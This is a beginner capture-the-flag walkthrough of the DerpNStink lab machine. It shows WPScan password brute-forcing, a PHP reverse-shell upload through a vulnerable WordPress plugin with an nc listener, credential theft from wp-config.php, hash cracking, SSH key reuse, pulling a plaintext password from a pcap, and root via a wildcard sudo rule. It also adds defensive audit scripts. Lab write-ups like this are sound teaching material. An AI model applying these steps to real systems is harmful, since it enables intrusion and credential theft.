DerpNStink
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
URL: DerpNStink
Difficulty: Beginner
Author: Bryan Smith
Enumeration
Set up the machine with a host-only adapter and run netdiscover to find its IP address. My interface eth1 is host-only on my main OS (Kali Linux).
netdiscover -i eth1
The IP 192.168.56.103 has been found, so we will port scan it:
nmap -sS -A -p- -oN nmap 192.168.56.103
The first open port is FTP (21). Some servers allow logging in as anonymous with no password:
ftp 192.168.56.103
Enter anonymous at the Name prompt. This was not possible here, so I will move on to enumerating the next port.
Port 80 is open, so have a look in a browser. This is what the web page looks like:
Nothing obvious stands out, so look at the page source.
There is an interesting link worth checking in one of the <script> tags, as shown below: a link to /webnotes/info.txt. Go to that path.
There is a message to “stinky” (a possible user) telling him to update his local hosts file with a local DNS entry so the blog website can be accessed. No blog was seen initially, so let’s go ahead and update the hosts file on our local machine. Before this, I want to double-check what else we can find at /webnotes. This is a snippet of what is found:
A username [email protected] is mentioned, which is worth noting. The nmap scan also mentioned a robots.txt file, so let’s have a look at that as well:
Paths /php and /temporary are listed in this. Let’s check them out:
This seems to be a rabbit hole. Nothing to see here. Now let’s continue updating our hosts file.
A hosts file is a plain text file that all operating systems use to translate hostnames into IP addresses. You can read more about this here.
Edit the /etc/hosts file with gedit or nano.
nano /etc/hosts
Map the machine’s IP address to a hostname:
192.168.56.103 derpnstink.local
The hostname should now resolve. Visit the web page under that name and enumerate it further.
Use dirb (a web content scanner) to find more paths on this website, hopefully including the blog the users have been talking about.
dirb http://derpnstink.local/
Visit the link and there is a blog. According to the dirb results, WordPress appears to be running. This is a snippet of my results:
WordPress is one of the most popular website-building platforms, which makes it a frequent target for attackers. Let’s use the popular WordPress vulnerability scanner WPScan. Here is a link to their website.
Kali Linux should already have this installed so I will be executing the following command:
wpscan --url http://derpnstink.local/weblog/ -e u,vp,vt
-e is the enumeration option. u, vp and vt mean the scan will look for users, vulnerable plugins and vulnerable themes respectively.
Some users have evidently been found: unclestinky and admin.
All the exploits reported by WPScan require authentication, which we do not yet have, so we will look for a way to obtain user credentials.
I will try brute-forcing, since WPScan has an option for brute-forcing passwords. This is the command:
wpscan --url http://derpnstink.local/weblog/ --passwords /usr/share/wordlists/rockyou.txt --username { user }
I have used the --passwords option to start a brute-forcing session. It takes a path to a password list, and the username is given after the --username parameter. I first tried unclestinky, then admin.
After some time there were no results. I tried the default admin credentials which gave a successful login. For some reason, the rockyou.txt file didn’t contain “admin”.
User
Now that we have authenticated access, we can use an exploit reported in the WPScan results. This exploit is ideal.
No need to use the exploit code. Just create a .php payload and upload it through the vulnerable slideshow plugin. There is a pre-made .php backdoor under the webshells directory on Kali Linux.
I copied this in my current directory with the following command:
locate webshells
cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the payload accordingly. Add your local IP address and a port you will be listening on.
nano php-reverse-shell.php
This is ready to upload to the slideshow plugin on Wordpress. Go to the WP web interface > slideshow and add your slide show.
Add in some information into the fields and upload your payload under “Choose Image”. Save the changes.
Before executing the payload, we need to listen on the chosen port. Set up a netcat session and listen on your specified port.
nc -nvlp 4444
Everything should be ready. Simply click on the slideshow you have just created to execute the payload. You can do this from the main “slideshow” page.
We have a reverse shell!
id
pwd
We have a reverse shell as “www-data”. Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
In order to see other users on this system, we can have a look at /etc/passwd or simply look at the home directories in /home.
cd /home
There are 2 users, mrderp and stinky. Looking into stinky’s home directory, we find a Pastebin link: https://pastebin.com/RzK9WfGw
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
These are the sudo privileges that mrderp has. We need access to his account to exploit this.
If you are not familiar with WordPress, the database credentials are kept in plaintext in the WordPress configuration file wp-config.php. Search for this file and view its contents with cat.
locate wp-config.php
cat /path/to/wp-config.php
A look at this file gives us some credentials.
These credentials are for the database. Let’s try these out. Go to /php/phpmyadmin.
The login is successful.
Earlier on when we scanned the Wordpress website, there was another user account. Let’s go to the Wordpress database and change the password to something we know so we can log into that account.
Go to wordpress > wp_users
As we know the password for the admin account, copy and paste the hash into unclestinky’s password field.
Now log in to stinky’s account and see if we can find any more information.
There isn’t much to see here except for another flag under the posts section:
Let’s move on to other credentials; we are done with WordPress. Going back to phpMyAdmin, go to mysql > user for some password hashes. We can crack some of these ourselves with John or just search for them online.
I have used this website to try and find a password for unclestinky / [email protected]:
*9B776AFB479B31E8047026F1185E952DD1E530CB : wedgie57
The password wedgie57 has been found. Let’s attempt to change the user to stinky with su using the password we found.
su stinky
There is another flag in the Desktop directory of stinky.
cd stinky/Desktop
ls -la
cat flag.txt
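Why the hash looked up above was so easy to find, as an added example that is not part of the original walkthrough: a leading * followed by 40 hex digits is MySQL’s mysql_native_password format, an unsalted SHA1(SHA1(password)). With no salt, every account using the same password gets the same hash, which is exactly what online lookup tables exploit, so an administrator can audit a mysql.user dump against a small list of known-weak passwords the same way. The weak-password list below is constructed; the hash is the one from the box.

```python
import hashlib

def mysql_native_hash(password: str) -> str:
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password)). No salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def looks_like_native_hash(value: str) -> bool:
    """True for the '*' + 40 hex digit shape seen in the mysql.user table."""
    body = value[1:]
    return (value.startswith("*") and len(body) == 40
            and all(c in "0123456789ABCDEF" for c in body))

def audit_user_table(rows, known_weak):
    """Flag (user, hash) rows whose hash equals the hash of a known-weak password.
    Because the scheme is unsalted, one hash per candidate password covers every user."""
    lookup = {mysql_native_hash(p): p for p in known_weak}
    findings = []
    for user, h in rows:
        if not looks_like_native_hash(h):
            findings.append((user, "not a mysql_native_password hash"))
        elif h in lookup:
            findings.append((user, f"weak password: {lookup[h]}"))
    return findings

if __name__ == "__main__":
    rows = [("unclestinky", "*9B776AFB479B31E8047026F1185E952DD1E530CB")]  # from the box
    weak = ["password", "admin", "wedgie57"]                                 # constructed list
    print(audit_user_table(rows, weak))
```

Newer MySQL releases default to caching_sha2_password, which salts the stored value, so the same check no longer works against those rows.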
Under the ftp/files/network-logs directory, there is a snapshot of a conversation between mrderp and stinky. There is a mention of a packet capture which is important as there may be a password in plaintext in there.
There is also an ssh directory under ftp. If you keep going into the ssh directories, there is a .txt file named key. This is an RSA private key. Read more about it here. It can be used in place of a password when connecting to a server via SSH.
In order to ssh with a private key, copy this key over to your local machine.
nano ssh
Paste the key, then press Ctrl+X, Y, Enter to save.
Before using this as a key, change the permissions by executing the following command:
chmod 700 ssh
You can read more about chmod and file permissions here.
ssh -i ssh stinky@derpnstink.local
The above command connects to the host derpnstink.local as user stinky. The -i ssh option specifies the identity (private key) file to use. If your key file has a different name, replace ‘-i ssh’ with ‘-i {file name}’.
A successful login. The ssh session is easier to work with.
stinky’s Documents directory contains a pcap file. Let’s analyse it. A .pcap file contains recorded network traffic. Read more about this here. A popular tool to analyse pcap files is Wireshark.
However, I will be just analysing the strings in this file. ‘Strings’ prints the strings of printable characters in files. Read more about strings here. Hopefully, we can get some sort of password in plaintext from the .pcap file.
strings derpissues.pcap
Returns this:
There are far too many strings to go through. Although we could write the output to a file and analyse it further, let’s grep the results instead. In this case, I will use ‘grep "pass"’ to see if a password field was captured in the network traffic. Read more about grep here.
strings derpissues.pcap | grep "pass"
The above command essentially finds all the strings in the .pcap file and only prints when there is a “pass” in the string. Here is the result:
As you can see, the second instance of “pass” looks good.
derpderpderpderpderpderpderp
To test out this password, change user to mrderp and use that password.
su mrderp
id
A successful login.
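The strings-and-grep step above, rewritten as an added example that is not part of the original walkthrough: a minimal parser for the classic pcap format (24-byte global header, then 16-byte record headers) combined with a strings(1)-style extractor, so that each cleartext credential hit is tied to the timestamp of the packet it travelled in. That is what a defender needs to trace the finding back to the service that was accepting logins over plain HTTP. The capture is constructed inline; the 54 zero bytes stand in for Ethernet/IP/TCP headers, which this example does not decode.

```python
import struct

def iter_records(data):
    """Yield (timestamp, packet_bytes) from a classic pcap; pcapng is not handled."""
    magic = struct.unpack("<I", data[:4])[0]
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)   # byte order from the magic
    if end is None:
        raise ValueError("not a classic pcap file")
    off = 24                      # global header: magic, version, tz, sigfigs, snaplen, linktype
    while off + 16 <= len(data):  # record header: ts_sec, ts_usec, incl_len, orig_len
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len

def printable_strings(blob, min_len=4):
    """What strings(1) does: runs of printable ASCII at least min_len bytes long."""
    out, run = [], bytearray()
    for b in blob + b"\x00":      # trailing NUL flushes the final run
        if 32 <= b < 127:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out

def find_cleartext_credentials(data, needle="pass"):
    """Like strings | grep, but every hit keeps the timestamp of its packet."""
    return [(ts, s) for ts, pkt in iter_records(data)
            for s in printable_strings(pkt) if needle in s.lower()]

# Constructed capture: two Ethernet-framed records (link type 1). The HTTP text models
# a WordPress profile-page password change sent without TLS, which is why grep sees it.
def _record(ts_sec, payload):
    pkt = b"\x00" * 54 + payload  # placeholder for the Ethernet/IP/TCP headers
    return struct.pack("<IIII", ts_sec, 0, len(pkt), len(pkt)) + pkt

SAMPLE_PCAP = (
    struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    + _record(1514000000, b"GET /weblog/wp-admin/profile.php HTTP/1.1\r\nHost: derpnstink.local\r\n\r\n")
    + _record(1514000001, b"POST /weblog/wp-admin/profile.php HTTP/1.1\r\nHost: derpnstink.local\r\n\r\n"
                          b"user_login=mrderp&pass1=derpderpderpderpderpderpderp&pass2=derpderpderpderpderpderpderp")
)

if __name__ == "__main__":
    for ts, s in find_cleartext_credentials(SAMPLE_PCAP):
        print(f"{ts:.6f}  {s}")
```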
Privilege Escalation
Now we have access to a user where we can start exploiting the sudo rights as mentioned before. A look at derp’s documents reveals an email he has saved which outlines a problem with a sudo file.
This could be referring to that Pastebin we saw earlier. Check the sudo rights of derp:
sudo -l
mrderp is allowed to run, via sudo, anything matching /home/mrderp/binaries/derpy*. As you can see in the screenshot, the binaries directory does not exist (cd failed), so to exploit the sudo rule, create it in /home/mrderp:
mkdir binaries
cd binaries
Any file whose name starts with derpy (the * matches anything) can now be run with sudo.
echo "/bin/bash" > derpy.sh
The above command writes “/bin/bash” into a file called derpy.sh. Run through sudo, it starts a root shell. To execute this file, it must be made executable.
chmod +x derpy.sh
Now execute the file:
sudo ./derpy.sh
id
The id command shows we are root. The flag will be located in /root.
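The rule that made this escalation possible combines two weaknesses: a glob in the command path and a path inside the user’s own home directory, so mrderp decides what sudo runs as root. As an added example that is not part of the original walkthrough, the audit helper below parses sudoers user specs and flags exactly those patterns; the sample sudoers text is constructed, with the mrderp line taken from the Pastebin rule above.

```python
import re

# Sudoers user specs look like:  user|%group  hosts=(runas[:group])  [TAG:] cmd[, cmd ...]
SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")

def parse_sudoers(text):
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@")) or line.split()[0].endswith("_Alias"):
            continue                      # Defaults, includes and alias definitions are out of scope
        m = SPEC.match(line)
        if not m:
            continue
        user, host, runas, cmds = m.groups()
        for cmd in (c.strip() for c in cmds.split(",")):
            tags = []
            while ":" in cmd and cmd.split(":", 1)[0].isupper():   # NOPASSWD:, SETENV:, ...
                tag, cmd = (s.strip() for s in cmd.split(":", 1))
                tags.append(tag)
            rules.append({"user": user, "host": host, "runas": runas or "root",
                          "tags": tags, "cmd": cmd})
    return rules

def audit_rule(rule):
    """Reasons a rule lets the listed user choose what sudo runs as root."""
    path = rule["cmd"].split()[0] if rule["cmd"] else ""
    owner = rule["user"].lstrip("%")       # for a %group rule this home check is only approximate
    reasons = []
    if path == "ALL":
        reasons.append("unrestricted ALL")
    if any(ch in path for ch in "*?["):
        reasons.append("glob in command path")
    if path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/", f"/home/{owner}/")):
        reasons.append("command under a directory the user can write to")
    if "NOPASSWD" in rule["tags"]:
        reasons.append("no password required")
    return reasons

def audit_sudoers(text):
    return [(r["user"], r["cmd"], audit_rule(r)) for r in parse_sudoers(text) if audit_rule(r)]

SAMPLE = """
Defaults env_reset
%sudo   ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL) /home/mrderp/binaries/derpy*
stinky  ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for user, cmd, why in audit_sudoers(SAMPLE):
        print(f"{user}: {cmd} -> {', '.join(why)}")
```

The fix the rule needs is a fixed, root-owned path with no wildcard (for example a script installed under /usr/local/sbin) rather than anything under the user’s home.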